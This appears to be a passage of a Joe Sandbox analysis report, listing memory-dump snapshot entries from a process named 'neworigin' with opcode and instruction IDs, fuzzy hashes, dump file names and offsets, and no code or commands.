                                                                                                              • Instruction ID: cbd2e1bb96502711c1308d90deb1940f64857745e9343aa4879687c6484efbeb
                                                                                                              • Opcode Fuzzy Hash: cd19e0a34ce5b0593197988615891add1cf1b273aa20eed37849d7129376b36a
                                                                                                              • Instruction Fuzzy Hash: 4A914C34E1061A8BDF60DF68C890B9DB7B5FF89700F208699D549BB245DB70AA85CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 859ded30ef52bec8e194e4dc59d224a41535ffa04bec4610b7845be837b8077d
                                                                                                              • Instruction ID: 7a21395979b7dc6fe19ec848e2387d6f45965aad0e41341206b4814029b18ec2
                                                                                                              • Opcode Fuzzy Hash: 859ded30ef52bec8e194e4dc59d224a41535ffa04bec4610b7845be837b8077d
                                                                                                              • Instruction Fuzzy Hash: 8B217A75E012269FDF54DF69E880BAEBBF5AB48700F118129E905E7384D635DD418B90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db80b22f8cdbe5a6e42ee4e1d551550522760e48f194572e79a3d64fea7829f7
                                                                                                              • Instruction ID: 100e73730f72a92a6987eae704387bc1698eeceea548df2c1f0121e047cb7859
                                                                                                              • Opcode Fuzzy Hash: db80b22f8cdbe5a6e42ee4e1d551550522760e48f194572e79a3d64fea7829f7
                                                                                                              • Instruction Fuzzy Hash: 4A216975E0062A9FDF54DF69D880BAEBBF5AB48710F108129E905E7388E735DD408B90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3781375790.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_fdd000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e490254ac211494acd0410d701ce0aae6604768c0d2dafdca344e72a9ae8bd67
                                                                                                              • Instruction ID: 312bd0d0d0ea4d34742ff8fddf41a1d066072b171d357d18ef3135c4bd185cc1
                                                                                                              • Opcode Fuzzy Hash: e490254ac211494acd0410d701ce0aae6604768c0d2dafdca344e72a9ae8bd67
                                                                                                              • Instruction Fuzzy Hash: 1A2138B2904344DFDB05DF10D8C0B26BB66FB84325F28C56ED8490B345C376D846DAA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3781375790.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_fdd000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 617791c46ab8255a2c109ac478e3eadce4efa508f5f103cdc10d499e83b14ec6
                                                                                                              • Instruction ID: 0884976787edb542ad5f8b37f2b67e9932e372939eb282fa5f3c4af1bd0566bb
                                                                                                              • Opcode Fuzzy Hash: 617791c46ab8255a2c109ac478e3eadce4efa508f5f103cdc10d499e83b14ec6
                                                                                                              • Instruction Fuzzy Hash: 63212975904344DFDB05DF14D5C0B26BB66FB85324F38C56ED80A4B386C376E846DA62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3781375790.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_fdd000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1e4913294f999f09b9c2836dc48528671ed9d769e397b1a515205c3d5859ef24
                                                                                                              • Instruction ID: 3f0fdd5f3502405dfbc21fa897ce9a280405b412a8f334a6b0ca28c489b1c048
                                                                                                              • Opcode Fuzzy Hash: 1e4913294f999f09b9c2836dc48528671ed9d769e397b1a515205c3d5859ef24
                                                                                                              • Instruction Fuzzy Hash: 62212572904204DFDB14CF20C8C4B26BB66FB84324F28C56EE9490B346C736D846DA62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 154f7533f950adb6d8985e80dc96b9191d8d884db0d80b20c8e52240afad7580
                                                                                                              • Instruction ID: a6ea1e3ab780e64b77fffcfdcb937c4ee671e63c13a8b6ab2994234ff4fee5b0
                                                                                                              • Opcode Fuzzy Hash: 154f7533f950adb6d8985e80dc96b9191d8d884db0d80b20c8e52240afad7580
                                                                                                              • Instruction Fuzzy Hash: EE21D230F1012A9BCF54EBA9E950BADB7ABEF84310F248525D405EBB49DB30ED5187C0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 70f676c05ffe62f0bc9ee49bfae4a183ccc6a0a42b941297099fff764a103be2
                                                                                                              • Instruction ID: 1938dcabb8c6a672d720b9d7ca8910ff0f64feba00266179864981c1fa582cad
                                                                                                              • Opcode Fuzzy Hash: 70f676c05ffe62f0bc9ee49bfae4a183ccc6a0a42b941297099fff764a103be2
                                                                                                              • Instruction Fuzzy Hash: BA11F530B042610FDB659A7CD55072EBBEAEFCA710F24843EE089CB35AD965DC0287A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 048a15739ed718f67eb496974c8a1e6ff78aedc8b85f55649977340a82e05a84
                                                                                                              • Instruction ID: de34b915ec820fa4211433b7e37f69eb3c10292c164aa1ac84fe0eaa4f456c04
                                                                                                              • Opcode Fuzzy Hash: 048a15739ed718f67eb496974c8a1e6ff78aedc8b85f55649977340a82e05a84
                                                                                                              • Instruction Fuzzy Hash: A3014730B005211FCB619EBCD490B2F77EAEBCA310F24843DE50AC7745DA25DC024392
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3781375790.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_fdd000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                                                                                              • Instruction ID: 5510bf4bd9acb92c45e8540167998779c6254d795ab06a828e7222a8dc21201e
                                                                                                              • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                                                                                              • Instruction Fuzzy Hash: 9F119076904244DFDB15CF10D5C4B15BB72FB84324F28C6AAD8494B756C33AD84ADF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3781375790.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_fdd000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c0f73ed92b59b8f5d5057bc2053e5f8659ab4069548d40049fc97eec44a11b2c
                                                                                                              • Instruction ID: 65059423a7ef244e09fef4b9a4a0c27a632f7d8513028f4cd77b480455c59f84
                                                                                                              • Opcode Fuzzy Hash: c0f73ed92b59b8f5d5057bc2053e5f8659ab4069548d40049fc97eec44a11b2c
                                                                                                              • Instruction Fuzzy Hash: 0A119076904284CFDB12CF10D5C4B56BB72FB84324F28C6AAD8494B756C33AD806CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3781375790.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_fdd000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                                                                                              • Instruction ID: a6478b692dcdbe45a8ff94724d53fdc6741d867ba2e25e99b7cbc0acb67ed9ff
                                                                                                              • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                                                                                              • Instruction Fuzzy Hash: 0511BB75904280DFCB12CF10D5C4B15BBA2FB85324F28C6AAD8494B756C33AE80ACBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 30c4015b5b86eec5b8e52280c6f18da6b4992a72205bee3a1a131d5d5767060f
                                                                                                              • Instruction ID: 483ea6a42eac214c8f2696e25aa26cae8b23a420566052f85a0267d7a67e7c9a
                                                                                                              • Opcode Fuzzy Hash: 30c4015b5b86eec5b8e52280c6f18da6b4992a72205bee3a1a131d5d5767060f
                                                                                                              • Instruction Fuzzy Hash: 8401AD71B101210BDBA4966DD640B2EB2EAEBC9B10F24843EE50AC7758DD65DC0243A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bb896dc40f7c7e7c1358a2a9fc01308207a517900d27f0b8ff61d085cff9f89b
                                                                                                              • Instruction ID: a009b074119616f5f33e0d08c3cae12737bfe1818f73c424ed7addf502117356
                                                                                                              • Opcode Fuzzy Hash: bb896dc40f7c7e7c1358a2a9fc01308207a517900d27f0b8ff61d085cff9f89b
                                                                                                              • Instruction Fuzzy Hash: E9012871B105221BDF6595BDA550B2F73EAEBCA710F24843EE10AC7744DE25DC020396
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 917e7459390c94f42c79f648ced89b959c72edd53ffac3c3529bb1fa5ca4b6fb
                                                                                                              • Instruction ID: ebf521bd96258383d8cb50a6b4176a07bda58c832384e788f6c8b635b768d805
                                                                                                              • Opcode Fuzzy Hash: 917e7459390c94f42c79f648ced89b959c72edd53ffac3c3529bb1fa5ca4b6fb
                                                                                                              • Instruction Fuzzy Hash: 3601BC71E043298BEB65DBA4C8107FEBAF6BF8D710F140529C442B7A84DFB45980DBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 43c73e45498ca11c32badf44525ec18b635a93051c091526696de27c8f2ecc58
                                                                                                              • Instruction ID: 5117e9adf31cece8cbbd73838f9d1650084488c6f21baed99dd21b2c0bf6b592
                                                                                                              • Opcode Fuzzy Hash: 43c73e45498ca11c32badf44525ec18b635a93051c091526696de27c8f2ecc58
                                                                                                              • Instruction Fuzzy Hash: 5EF096303092A04FD745A7789864A593FA69F8B700F0640EBE095CF7E3CD558C0587A5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c52366154d4257ace21f00c2c67f4d0765caf080cf0084bd7082cda3cb1c98e7
                                                                                                              • Instruction ID: 0d1f1f70ba54a935fc63e1e849a1bc6bdbe1ff08b627b5f70bab07ceabd48e3c
                                                                                                              • Opcode Fuzzy Hash: c52366154d4257ace21f00c2c67f4d0765caf080cf0084bd7082cda3cb1c98e7
                                                                                                              • Instruction Fuzzy Hash: 8DE065303000104FD788B768D924B5D3B969FC9B00F0180A9A509CB3E2CDA1DC014BC4